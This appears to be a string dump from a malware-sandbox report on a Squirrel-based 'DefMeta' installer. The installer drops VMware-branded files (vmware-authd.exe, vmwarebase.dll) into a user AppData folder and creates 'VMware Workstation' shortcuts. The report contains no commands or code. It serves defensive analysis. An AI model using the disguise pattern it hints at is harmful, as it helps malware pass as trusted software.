Source: vmware-authd.exe, 00000004.00000002.3263231070.00000000029BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DD"C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe"
Source: vmware-authd.exe, 00000004.00000002.3263231070.0000000002980000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe" --squirrel-firstrun
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOffline_HGFSSetEnabled
Source: vmware-authd.exe, 00000004.00000002.3263231070.000000000298E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sers\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exeDLL
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOffline_HGFSSetPresent
Source: vmwarebase.dll.3.dr	Binary or memory string: ?VigorOffline_VMCISetPciSlotNumber@@YGHXZ
Source: vmwarebase.dll.3.dr	Binary or memory string: ?VigorOffline_VMCISetNumaNode@@YGHXZ
Source: vmware-authd.exe, 00000004.00000002.3263231070.000000000298E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe--squirrel-firstrun
Source: vmware-authd.exe, 00000004.00000002.3263231070.00000000029F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe}~
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: About to save shortcut: C:\Users\user\Desktop\VMware Workstation.lnk (target C:\Users\user\AppData\Local\DefMeta\vmware-authd.exe, workingDir C:\Users\user\AppData\Local\DefMeta\app-1.0.0, args , toastActivatorCSLID 42308fda-ab09-5018-a5bc-4c64b70949ed)
Source: Update.exe, 00000003.00000002.2064689456.000000001BA22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /C:/Users/user/AppData/Local/DefMeta/app-1.0.0/vmware-authd.exe{
Source: VMware Workstation.lnk0.3.dr	Binary or memory string: %USERPROFILE%\AppData\Local\DefMeta\vmware-authd.exe
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOnlineRPC_HGFSSetHostPath
Source: Update.exe, 00000003.00000002.2062592570.0000000003103000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: `About to create shortcuts for vmware-authd.exe, rootAppDir C:\Users\user\AppData\Local\DefMeta
Source: vmware-authd.exe, 00000004.00000002.3263231070.00000000029F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\Temp\AslLog_PcaCliDebug_vmware-authd.exe_5456.txt`
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOffline_HGFSSetFollowSymlinks
Source: vmware-authd.exe.3.dr	Binary or memory string: nfcnfcsslvmware-hostdPROXY service %s not found.USER too long.Password required for %s.Login with USER first.InSeCuRePassword not understood.User %s logged in.LOGIN FAILURE from %.128s, %s
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOnlineRPC_HGFSSetPresent@@YGHXZ
Source: vmwarebase.dll.3.dr	Binary or memory string: VigorOffline_VMCISetUnrestricted
Source: DefMeta-1.0.0-full.nupkg	Binary or memory string: lib/net48/vmware-authd.exe
Source: vmware-authd.exe, 00000004.00000002.3263231070.00000000029F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1998-2022 VMware, Inc.
Source: vmware-authd.exe, 00000004.00000002.3263231070.000000000298E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exed
Source: vmware-authd.exe, 00000004.00000002.3263231070.00000000029F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hnsi1NbLrEy+rmUy.3lfons\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exeQ~
Source: vmware-authd.exe, 00000004.00000002.3263231070.00000000029BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exee
Source: vmware-authd.exe.3.dr	Binary or memory string: ProductNameVMware WorkstationP
Source: VMware Workstation.lnk0.3.dr	Binary or memory string: vmware-authd.exe
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.p^!
Source: vmware-authd.exe, 00000004.00000002.3262706550.000000000033C000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: 3\Device\HarddiskVolume3\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOnlineQuery_HGFS
Source: vmware-authd.exe, 00000008.00000002.3263091725.0000000003020000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe"
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: lib\net48\vmwarebase.dll
Source: Update.exe, 00000003.00000002.2064689456.000000001BA00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FILE%\AppData\Local\DefMeta\vmware-authd.exe
Source: vmwarebase.dll.3.dr	Binary or memory string: ?W32Util_GetVMwareGroupSid@@YGHXZ
Source: vmware-authd.exe.3.dr	Binary or memory string: FileDescriptionVMware Authorization ServiceL
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOffline_HGFSSetGuestName@@YGHXZ
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: QC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc
Source: vmwarebase.dll.3.dr	Binary or memory string: VigorOffline_QueryVMCI
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: HgfsEscape_Undo
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: XCreating shortcut for vmware-authd.exe => C:\Users\user\Desktop\VMware Workstation.lnk
Source: vmware-authd.exe, 00000008.00000002.3262995969.0000000002EC0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe"C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe" C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exeWinSta0\Default
Source: Update.exe, 00000003.00000002.2062094561.00000000011CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $vmware-authd.exe
Source: vmware-authd.exe, 00000004.00000002.3264229498.000000006E17C000.00000004.00000001.01000000.0000000A.sdmp	Binary or memory string: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exeH
Source: vmware-authd.exe, 00000008.00000002.3263091725.000000000302E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -+ncalrpc:[OLED94B0E86D288B4331018DFF713A0]\vmwarebase.DLL.2.Config3
Source: VMware Workstation.lnk0.3.dr	Binary or memory string: DefMeta0..\..\..\..\..\..\Local\DefMeta\vmware-authd.exe/C:\Users\user\AppData\Local\DefMeta\app-1.0.06C:\Users\user\AppData\Local\DefMeta\vmware-authd.exe
Source: vmware-authd.exe, 00000004.00000002.3263231070.000000000298E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exeJ
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOffline_HGFSSetTags
Source: vmwarebase.dll.3.dr	Binary or memory string: VigorOffline_VMCISetPciSlotNumber
Source: vmwarebase.dll.3.dr	Binary or memory string: ?VigorOnlineRPC_VMCISetFiltering@@YGHXZ
Source: vmware-authd.exe.3.dr	Binary or memory string: Invalid pathname (too long)Config file not found: %sVMware Server ConsoleYou need read access in order to connect with the %s. Access denied for config file: %sYou need execute access in order to connect with the %s. Access denied for config file: %s%s-fdConnect %sError connecting to %s service instance.Can't create mutex '%s' (%d)Timeout acquiring thread lock.-fdCould not open %s process %d. (error %d)Error connecting to vmx process.No such %s process: %s
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOffline_HGFSSetExpiration
Source: Update.exe, 00000003.00000002.2064446996.000000001B980000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk
Source: vmwarebase.dll.3.dr	Binary or memory string: W32Util_GetVmwareCommonAppDataFilePath
Source: Update.exe, 00000003.00000002.2062592570.000000000324D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: lib/net48/vmware-authd.exe0y
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Creating shortcut for vmware-authd.exe => C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk
Source: vmware-authd.exe, 00000004.00000002.3263231070.000000000298E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe<
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 16/02/24 14:29:59: exclude new version folder app-1.0.0Workstation.lnk (target C:\Users\user\AppData\Local\DefMeta\vmware-authd.e
Source: vmware-authd.exe, 00000004.00000002.3263231070.00000000029F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe]q
Source: vmware-authd.exe.3.dr	Binary or memory string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc
Source: vmware-authd.exe, 00000008.00000002.3263091725.0000000003020000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe" C
Source: vmware-authd.exe.3.dr	Binary or memory string: CompanyNameVMware, Inc.b
Source: vmware-authd.exe, 00000004.00000002.3263231070.00000000029F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmware-authd.exea@
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOffline_HGFSPurge@@YGHXZ
Source: vmware-authd.exe	Binary or memory string: \\.\pipe\vmware-authdpipe
Source: Update.exe, 00000003.00000002.2064446996.000000001B980000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 2VMware
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware-authd.exep^!
Source: vmwarebase.dll.3.dr	Binary or memory string: VigorOffline_VMCISetNumaNode
Source: vmware-authd.exe, 00000004.00000002.3263077930.0000000002580000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe"C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe" --squirrel-firstrunC:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exeWinsta0\Default
Source: vmware-authd.exe.3.dr	Binary or memory string: PANIC: %s599 vmware-authd PANIC: %s
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOnlineRPC_HGFSSetTags
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: @C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
Source: Update.exe, 00000003.00000002.2062592570.0000000003103000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: About to save shortcut: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk (target C:\Users\alfon
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOffline_QueryHGFS@@YGHXZ
Source: vmware-authd.exe, 00000008.00000002.3263091725.0000000003020000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe"C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe" C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exeWinSta0\DefaultALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows__COMPAT_LAYER=ApplicationMonitorOR_
Source: vmware-authd.exe.3.dr	Binary or memory string: 17.0.0 build-20800274VMware Workstation%s Authentication Daemon Version %u.%u for %s %s
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOffline_HGFSSetEnabled@@YGHXZ
Source: vmware-authd.exe, 00000004.00000002.3263231070.00000000029AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: k VMWARE~1.EXER
Source: vmware-authd.exe, 00000004.00000002.3263231070.00000000029F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6pa\app-1.0.0\vmware-authd.exe
Source: vmwarebase.dll.3.dr	Binary or memory string: VigorOnlineRPC_VMCISetFiltering
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOnlineRPC_HGFSPurge
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOffline_QueryHGFS
Source: DefMeta-1.0.0-full.nupkg	Binary or memory string: lib/net48/vmwarebase.dll
Source: vmware-authd.exe.3.dr	Binary or memory string: VMware Authorization Service
Source: vmware-authd.exe, 00000008.00000002.3263091725.0000000003020000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\Temp\AslLog_ApphelpDebug_vmware-authd.exe_7208.txt
Source: ProtectionManagement.mfl.8.dr	Binary or memory string: [Description("Specifies whether the machine is a virtual machine") : Amended ToSubclass] boolean IsVirtualMachine;
Source: Update.exe, 00000003.00000002.2062592570.000000000324D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: LIB/NET48/VMWARE-AUTHD.EXE
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOnlineRPC_HGFSSetGuestName@@YGHXZ
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOffline_HGFSSetExpiration@@YGHXZ
Source: vmware-authd.exe, 00000008.00000003.2120194531.00000000030B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Local\DefMeta\app-1.0.0\vmware-authd.exe
Source: Update.exe, 00000003.00000002.2064689456.000000001BA22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ..\AppData\Local\DefMeta\vmware-authd.exe
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOffline_HGFSSetWriteAccess
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware Authorization Servicep^!
Source: Squirrel-Install.log.3.dr	Binary or memory string: [16/02/24 14:29:58] info: ApplyReleasesImpl: Creating shortcut for vmware-authd.exe => C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc.\VMware Workstation.lnk
Source: vmware-authd.exe.3.dr	Binary or memory string: Authorization and authentication service for starting and accessing virtual machinesVMware Authorization ServiceVMAuthdServiceSuccessfully registered %s.
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOffline_HGFSSetHostDefaultCase@@YGHXZ
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: `ApplyReleasesImpl: a.vmware-authdd.exe => C:\Use
Source: vmware-authd.exe.3.dr	Binary or memory string: 599 vmware-authd PANIC: %s
Source: vmwarebase.dll.3.dr	Binary or memory string: ?VigorOffline_VMCISetPresent@@YGHXZ
Source: Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: /LIB/NET48/VMWARE-AUTHD.EXE
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOnlineRPC_HGFSSetHostDefaultCase
Source: vmware-authd.exe.3.dr	Binary or memory string: vmware-hostd
Source: Update.exe, 00000003.00000002.2062094561.00000000011CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: "com.squirrel.DefMeta.vmware-authd7
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?VigorOffline_HGFSSetHostPath@@YGHXZ
Source: ProtectionManagement.dll.8.dr	Binary or memory string: Microsoft HvVMwareVMware
Source: VMware Workstation.lnk0.3.dr	Binary or memory string: r2vmware-authd.exeR
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: hC:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc\VMware Workstation.lnk
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: !com.squirrel.DefMeta.vmware-authd
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOffline_HGFSSetHostPath
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: ?HgfsEscape_Undo@@YGHXZ
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOnlineQueryShared_HGFS
Source: Squirrel-Install.log.3.dr	Binary or memory string: [16/02/24 14:29:58] info: ApplyReleasesImpl: About to save shortcut: C:\Users\user\Desktop\VMware Workstation.lnk (target C:\Users\user\AppData\Local\DefMeta\vmware-authd.exe, workingDir C:\Users\user\AppData\Local\DefMeta\app-1.0.0, args , toastActivatorCSLID 42308fda-ab09-5018-a5bc-4c64b70949ed)
Source: vmware-authd.exe, 00000004.00000002.3263231070.0000000002980000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe"C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe" --squirrel-firstrunC:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exeWinsta0\Default=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows
Source: Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: /lib/net48/vmware-authd.exe
Source: vmware-authd.exe.3.dr	Binary or memory string: vmware-vmx-debug.exe
Source: Update.exe, 00000003.00000002.2062592570.0000000003183000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: .C:\Users\user\Desktop\VMware Workstation.lnkx.%
Source: vmware-authd.exe, 00000004.00000002.3263231070.000000000298E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \Device\HarddiskVolume3\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
Source: vmware-authd.exe, 00000004.00000002.3263231070.00000000029AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMWARE~1.EXE
Source: vmware-authd.exe, 00000004.00000002.3263231070.00000000029BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe
Source: vmwarebase.dll.3.dr	Binary or memory string: VigorOffline_VMCISetPresent
Source: vmware-authd.exe.3.dr	Binary or memory string: \\.\pipe\vmware-authdpipeCreateNamedPipe failed: %s (%d)
Source: vmware-authd.exe, 00000008.00000002.3263091725.0000000003020000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\Temp\AslLog_shimengstate_vmware-authd.exe_7208.txt
Source: Update.exe, 00000003.00000002.2064689456.000000001BA22000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: y\Machine\Software\Classes\Applications\vmware-authd.exe
Source: vmware-authd.exe.3.dr	Binary or memory string: vmware-vmx.exe
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOffline_HGFSSetHostDefaultCase
Source: vmware-authd.exe, 00000008.00000002.3263091725.00000000030B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmware-authd.exeyu
Source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E13B000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr	Binary or memory string: VigorOffline_HGFSSetGuestName
